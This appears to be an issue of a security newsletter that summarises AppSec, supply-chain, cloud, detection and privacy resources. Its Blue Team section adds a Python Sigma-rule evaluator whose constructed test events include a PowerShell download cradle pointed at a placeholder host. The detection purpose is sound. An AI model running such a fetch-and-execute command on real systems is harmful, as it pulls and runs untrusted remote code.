Hey there,
I hope you've been doing well!
LocoMocoSec
This week I'm at LocoMocoSec in Honolulu.
I've been wanting to attend for a number of years, because I feel like the talks are consistently high quality and in areas I care about.
After Day 1, I can confirm: the talks have been great, and I've met a ton of super sharp people. And that it's sunny and right next to the beach doesn't hurt either.
(Dinner with David Belcher, Philippe De Ryck, Dino Dai Zovi, Colleen Dai, and friends whose social links I don't know yet)
But to keep this from becoming Keeping up with the Clintdashians (the pilot script is ready to be optioned, hit me up, streaming platforms), I wanted to share a little more behind the scenes:
- I spent most of the flight out answering emails and reading articles for this newsletter.
- My first full day in Honolulu was largely working on the newsletter in my hotel room so I could relax during the conference.
- Right now it's 11:30pm and I'm in my hotel room finishing this newsletter while friends went swimming in the ocean.
I wanted to share this because social media and people talking about events publicly are almost always a misrepresentation, or at least a skewed representation of what actually happened.
People share the "look at me having fun" photos and not the "look at me eating Cheerios in my hotel room in Hawaii because I'm finishing my newsletter" photos.
If the latter sounds too specific to be made up, trust your instincts.
Sponsor
📢 Face vulnerabilities faster with a holistic view of your vulnerability data
Identifying & resolving security vulnerabilities is painful and time-consuming, but it doesn't have to be. Monad solves this problem by consolidating and correlating data from across all your vulnerability management tools and enrichment sources, such as AWS. Using an open data model, this enables security engineers to ticket and resolve vulnerabilities from a central source of truth. Eliminate the need to context switch between security tools, saving significant engineering hours for security teams with Monad. Find out more!
Learn more in the Monad blog
In this newsletter...
- AppSec: Finding command execution sinks in decompiled JVM languages, Semgrep rules for PHP security assessments
- Web Security: Building an AppSec pipeline with Burp data, a tale of 60 RCE in 60 minutes
- Supply Chain: Automate pinning of CI/CD workflow versions, evaluate GitHub org/repo/user setting security with OPA, SLSA L3 Golang native builder for GitHub Actions, free course on getting started with Sigstore
- Infrastructure as Code: Terraform Cloud adds drift detection
- Cloud Security: Tool to simulate the EC2 instance metadata service, cloud risk encyclopedia, cloud service provider agents add attack surface
- Blue Team: Sigma overview and how to write your own rules, tool to help building for air gapped environments
- Politics / Privacy: Guides on opting out from data brokers, Chinese threat actor uses ransomware as a smokescreen for espionage, how China is policing the future, takeaways on China's expanding surveillance state, Microsoft's lessons learned from defending Ukraine
- Misc: Draw your cloud system architecture in Python, a no-code API testing platform that generates test cases, newsletter to learn about patents, entrepreneur's guide to business loan interest rates, a thorough analysis of SF breakfast burritos
AppSec
Finding command execution sinks in decompiled JVM languages
There are a number of languages that compile to JVM bytecode. GitLab's Dominic Couture walks through looking for command execution calls in decompiled Kotlin, Groovy, Scala, and Clojure.
Semgrep rules for PHP security assessment
HN Security's Federico Dotta shares some general PHP and Yii framework Semgrep rules he created, focusing on SQL injection, XSS, and authorization bypass.
Web Security
Building on an AppSec Pipeline with Burp Suite data - Part 1
Willis Vandevanter walks through using burpsuite-project-file-parser to extract traffic history from Burp project files, and then in part 2 presents 8 bug hunting examples using this approach. For example, "find me all requests that have a URL parameter named url", and then test the endpoint for SSRF and/or use ffuf.
1001 ways to PWN prod: A tale of 60 RCE in 60 minutes
Neat slides with tons of examples, by @TheLaluka. Takeaways for defenders:


Supply Chain
sethvargo/ratchet
By Google's Seth Vargo: a tool for improving the security of CI/CD workflows by automating the process of pinning and unpinning upstream versions. It's like Bundler, NPM, or Pip, but for CI/CD workflows. Currently supports Circle CI, GitHub Actions, Google Cloud Build.
Evaluate Your Source Control Security Posture with GitGat
Scribe Security announces GitGat, a tool that uses OPA policies to evaluate GitHub organization/repositories/user accounts security: access controls, permissions, branch protection, and file modification tracking.
General Availability of SLSA 3 Go native builder for GitHub Actions
There's now a GitHub Action you can use that fulfills the properties of SLSA level 3. This allows you to:
- Detect rollback attacks, invalid source (due to expired and invalid domains), recycled GitHub accounts, and recreated GitHub repos
- Validate the process used to build the binary
- Check how an artifact was built (dev vs prod build, was the build sanitized or hardened with security options like PIE, etc.)
Get Started with Sigstore (Free Course!)
Chainguard's Lisa Tagliaferri and John Speed Meyers announce a new Sigstore course to educate the industry on how to digitally sign software artifacts to ensure a safer chain of custody that can be traced back to the source. Contents:
- Introducing Sigstore
- Cosign: Container Signing, Verification, and Storage in an OCI Registry
- Fulcio: A New Kind of Root Certificate Authority For Code Signing
- Rekor: Software Supply Chain Transparency Log
- Sigstore: Using the Tools and Getting Involved with the Community
Infrastructure as Code
Terraform Cloud Adds Drift Detection for Infrastructure Management
This new feature of Terraform Cloud continuously checks infrastructure state to detect and notify operators of any changes, minimizing risk, downtime, and costs. It'll be interesting to see if this impacts any security vendors who similarly offer drift detection.
Cloud Security
aws/amazon-ec2-metadata-mock
A tool to simulate Amazon EC2 instance metadata service for local testing.
Cloud Risk Encyclopedia
By Orca Security: "Search 1200+ cloud security risks or filter by cloud vendor, compliance framework, risk category, and criticality. 3 cloud platforms. 47 compliance frameworks. 18 risk categories. 4 risk levels."
The cloud gray zone - secret agents installed by cloud service providers
By Wiz's Nir Ohfeld and Shir Tamari: Cloud service providers install proprietary software on customers' virtual machines typically without the customer's awareness or explicit consent. This cloud middleware software, which bridges customers' virtual machines and cloud providers' managed services, can introduce new potential attack surface.
Wiz has launched a GitHub page to map all the agents that cloud providers are installing on customers' machines along with the additional attack surface they introduce.
Blue Team
A deep dive into Sigma rules and how to write your own threat detection rules
Sigma rules are a common language that enable defenders to share detections and avoid vendor lock-in, easily running the same rules on many SIEMs. FourCore's Hardik Manocha walks through the structure of Sigma rules and how to write your own.
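To make the rule structure concrete, here is an added example (mine, not the Sigma project's own code nor FourCore's): a toy evaluator for the detection block of a Sigma rule, run over constructed process-creation events. The rule, the events, and the filter exclusion are all constructed for illustration.

```python
# Added example, not the Sigma project's own code: a toy evaluator showing how the
# detection block of a Sigma rule is interpreted. Keys inside a selection are AND'ed,
# a list of values is OR'ed, "|contains"/"|endswith" are field modifiers, and the
# condition combines named selections with not / and / or (in that precedence).

RULE = {  # constructed rule, as the dict a YAML loader yields for a Sigma file
    "title": "Suspicious PowerShell download cradle",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],
        },
        "filter": {"ParentImage|endswith": "\\sccm_client.exe"},  # constructed known-good parent
        "condition": "selection and not filter",
    },
}

def _value_matches(actual, modifier, expected):
    a, e = str(actual).lower(), str(expected).lower()  # Sigma string matching is case-insensitive
    return e in a if modifier == "contains" else a.endswith(e) if modifier == "endswith" else a == e

def _selection_matches(selection, event):
    """Every key must match (AND); a list of values matches if any value does (OR)."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if field not in event or not any(_value_matches(event[field], modifier, v) for v in values):
            return False
    return True

def rule_matches(rule, event):
    """Evaluate the condition string over the named selections for one event."""
    det = rule["detection"]
    results = {name: _selection_matches(sel, event) for name, sel in det.items() if name != "condition"}
    term = lambda t: (not results[t[4:]]) if t.startswith("not ") else results[t]
    return any(all(term(t.strip()) for t in clause.split(" and "))
               for clause in det["condition"].split(" or "))

def firing_events(rule, events):
    """Indices of the events the rule would alert on."""
    return [i for i, ev in enumerate(events) if rule_matches(rule, ev)]

EVENTS = [  # constructed Sysmon-style process_creation events
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -nop IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "ParentImage": "C:\\Windows\\ccm\\sccm_client.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest http://updates.example.invalid/patch.msi"},
    {"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
]
```

Only the first event fires: the second matches the selection but is excluded by the `filter` selection, which is the usual way a Sigma rule author suppresses a known-benign parent process.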
Hoppr
Hoppr helps your applications and build dependencies hop between air gapped environments. It's a framework that supports packaging, transfer, and delivery of dependencies. Hoppr relies on the principles of Linux Foundation's focus on SPDX and the extended functionality of CycloneDX to define Software Bill-of-Materials and supply chain management.
Sponsor
📢 Conveyor's Vendor Trust platform: Never send another vendor security questionnaire
Tired of chasing vendors, tracking down SOC 2 reports, and trying to get them to fill out your security questionnaire?
Conveyor's Vendor Trust platform speeds vendor reviews by 5X by parsing your vendors' security docs, answering your questions for you, highlighting exceptions, and mapping their policies to your controls. Try it for free.
Sign up for free
Politics / Privacy
Delete Me: Opt-Out Guides
Massive list of how to guides to opt out of various data brokers.
Chinese Threat Actor Uses Ransomware as a "Smokescreen" For Espionage
A Chinese-based threat actor has been launching ransomware attacks against organizations in the U.S. and other countries, but researchers believe that the threat actor's end goal is stealing intellectual property as opposed to financial gain, and they estimated that 75 percent of the known victims would be of interest to Chinese government-sponsored groups focused on espionage based on the victims' geographic locations and industry verticals.
How China Is Policing the Future
With a simple fill-in-the-blank menu, the police can base alarms on specific parameters, including where a blacklisted person appears, when the person moves around, whether he or she meets with other blacklisted people and the frequency of certain activities. The police could set the system to send a warning each time two people with a history of drug use check into the same hotel or when four people with a history of protest enter the same park.
Whether or not he triggered the system, Mr. Zhang has noticed a change. Whenever he turns off his phone, he said, officers show up at his house to check that he hasn't left on a new trip to Beijing.
China's Expanding Surveillance State: Takeaways From a NYT Investigation
China's ambition to collect a staggering amount of personal data from everyday citizens is more expansive than previously known, a Times investigation has found. Phone-tracking devices are now everywhere. The police are creating some of the largest DNA databases in the world. And the authorities are building upon facial recognition technology to collect voice prints from the general public.
Defending Ukraine: Early Lessons from the Cyber War
This report represents research conducted by Microsoft's threat intelligence and data science teams with the goal of sharpening our understanding of the threat landscape in the ongoing war in Ukraine. The report also offers a series of lessons and conclusions resulting from the data gathered and analyzed. Notably, the report reveals new information about Russian efforts including an increase in network penetration and espionage activities amongst allied governments, non-profits and other organizations outside Ukraine. This report also unveils detail about sophisticated and widespread Russian foreign influence operations being used among other things, to undermine Western unity and bolster their war efforts. We are seeing these foreign influence operations enacted in force in a coordinated fashion along with the full range of cyber destructive and espionage campaigns.
Misc
Diagram as Code
Draw your cloud system architecture in Python code and track it in version control. Currently supports six major cloud providers (AWS, Azure, GCP, etc), on-premise nodes, and programming languages and frameworks.

keploy/keploy
By Keploy: A no-code API testing platform that generates test cases and data mocks from API calls. Dependency-mocks are automatically generated with the recorded request/responses.
Patent Drop Newsletter
Every week @thisisneer provides a summary of 3 new patents from big tech companies and a wider list of all patents from these companies.
The Entrepreneur's Guide to Business Loan Interest Rates
Nicely detailed guide by The Hustle.
Supporting Your Team When the News Is Terrible
Tips by Harvard Business Review for managers during stressful times.
An Extremely Thorough Analysis of Breakfast Burritos in SF
Now this is some research I can get behind

Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them
Thanks for reading!
Cheers,
Clint
@clintgibler